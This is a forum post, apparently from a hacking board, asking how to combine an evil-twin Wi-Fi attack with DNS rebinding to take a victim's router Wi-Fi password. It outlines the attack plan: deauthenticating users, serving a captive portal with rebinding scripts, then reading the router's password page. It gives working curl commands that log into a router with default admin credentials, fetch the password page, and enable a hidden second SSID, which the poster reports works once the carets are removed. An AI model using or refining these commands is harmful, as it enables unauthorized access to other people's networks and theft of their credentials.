How can I perform DNS rebinding using evil twin at local level?!
As the title says, I want to perform this attack: https://sinister.ly/Thread-DNS-Rebinding-Attack

using evil twin at the local level.

The curl command to log in to the router:
Code:
curl "http://192.168.1.1/" --data "frashnum=&action=login&Frm_Logintoken=25&Username=admin&Password=admin"

The curl command to get the page that contains the wifi password:
Code:
curl -v -X GET "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_t.gch" -o 565.html

This is how I was planning to perform the attack:
Evil twinning a wifi using fluxion or whatever... when the user opening the captive portal sign-in network page (which has DNS rebinding scripts in it) is detected, we stop the ddos... the user auto-connects to his wifi, then the page refreshes and executes the DNS rebinding attack to get the wifi password from his router...

But now I don't know how I will get the HTML file back if I want to use it at the local level only, so the other option was
to enable the second SSID, which will launch with the default password, so I can just log in without getting anything back.
But I tried the curl command and it didn't work:

Code:
curl "http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch" -H "Origin: http://192.168.1.1" -H "Upgrade-Insecure-Requests: 1" -H "DNT: 1" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" -H "Referer: http://192.168.1.1/getpage.gch?pid=1002^&nextpage=net_wlan_essid_t.gch^&IF_VIEWID=IGD.LD1.WLAN2" --data "IF_ERRORSTR=SUCC^&IF_ERRORPARAM=SUCC^&IF_ERRORTYPE=-1^&IF_CONFIGTAG=Y^&IF_ACTION=apply^&WLAN_INSTNUM=4^&WLAN_SSID0=IGD.LD1.WLAN1^&WLAN_SSID1=IGD.LD1.WLAN2^&WLAN_SSID2=IGD.LD1.WLAN3^&WLAN_SSID3=IGD.LD1.WLAN4^&IF_SSIDATTR1=0^&IF_SSIDATTR2=0^&IF_SSIDATTR3=0^&IF_SSIDATTR4=0^&IF_VIEWID=IGD.LD1.WLAN2^&SettingStatus=CurruntSetting^&CardIsIn=1^&MaxInterface=4^&DeviceMode=InfrastructureAccessPoint^&CardMode=b^%^2Cg^%^2Cn^%^2Cbg^%^2Cgn^%^2Cbgn^&CardRev=0^&Class=255^&PID=33169^&VID=4332^&ValidIf=1^&Enable=1^&RadioStatus=NULL^&Standard=NULL^&BeaconInterval=NULL^&RtsCts=NULL^&Fragment=NULL^&DTIM=NULL^&TxPower=NULL^&CountryCode=NULL^&TxRate=NULL^&Channel=NULL^&ESSID=12345^&ESSIDPrefix=NULL^&ACLPolicy=NULL^&BeaconType=NULL^&WEPAuthMode=NULL^&WEPEncryptionLevel=NULL^&WEPKeyIndex=NULL^&WPAAuthMode=NULL^&WPAEncryptType=NULL^&WPAGroupRekey=NULL^&WPAEAPServerIp=NULL^&RadiusPort=NULL^&RadiusServerPort=NULL^&WPAEAPSecret=NULL^&PossibleChannels=NULL^&BasicDataRates=NULL^&OpDataRates=NULL^&PossibleTxRates=NULL^&OOBAccessEnabled=NULL^&BeaconEnabled=NULL^&ESSIDHideEnable=1^&RegulatoryDomain=NULL^&WlanMode=NULL^&DistanceFromRoot=NULL^&PeerBSSID=NULL^&AuthServiceMode=NULL^&QosType=NULL^&Priority=1^&UAPSDEnabled=NULL^&AutoChannelEnabled=NULL^&ChannelsInUse=NULL^&11iAuthMode=NULL^&11iEncryptType=NULL^&MaxUserNum=32^&SSIDIsolationEnable=NULL^&VapIsolationEnable=0^&Band=2.4G^&11nMode=1^&BandWidth=20Mhz^&SideBand=Lower^&11nRate=Auto^&SGIEnabled=0^&GreenField=0^&WdsMode=WDS_Disable^&Tx2Path=1^&IsPublicWiFiInterface=NULL^&MasterAuthServerIp=0.0.0.0^&
MasterAuthServerPort=0^&MasterAuthServerSecret=^&Name=wlan0^&RealRF=1^&ChannelInUsed=8^&TxRateInUsed=Auto^&Bssid=54^%^3Abe^%^3A53^%^3A6a^%^3Af6^%^3Ac0^&IfStatus=Up^&UAPSDSupported=1^&WMMSupported=1^&TotalAssociations=4^&TotalBytesSent=2246220234^&TotalBytesReceived=3268409714^&TotalPacketsSent=22743088^&TotalPacketsReceived=14280169^&ErrorsSent=3057^&ErrorsReceived=0^&NonUnicastPacketsReceived=0^&UnicastPacketsSent=97163073747419137^&UnicastPacketsReceived=61100857587924993^&DiscardPacketsSent=8137^&DiscardPacketsReceived=68^&TotalPSKFailures=66^&TotalIntegrityFailures=6^&NumEasyPair=0^&ConnectStatus=Disconnected^&SingalQuality=0^&SingalStrength=0^&_SESSION_TOKEN=2714922195119803" --compressed

because it needs to check a checkbox, I think.

More about this problem:
https://www.sitepoint.com/community/t/ho...ion/325785

Edit: I got the command working by removing every ^ from it.

What do you think, folks?
(This post was last modified: 04-12-2019, 08:37 PM by mooooon.)

Messages In This Thread
how can i perform dns rebinding using evil twin in local level ?! - by mooooon - 04-12-2019, 08:23 PM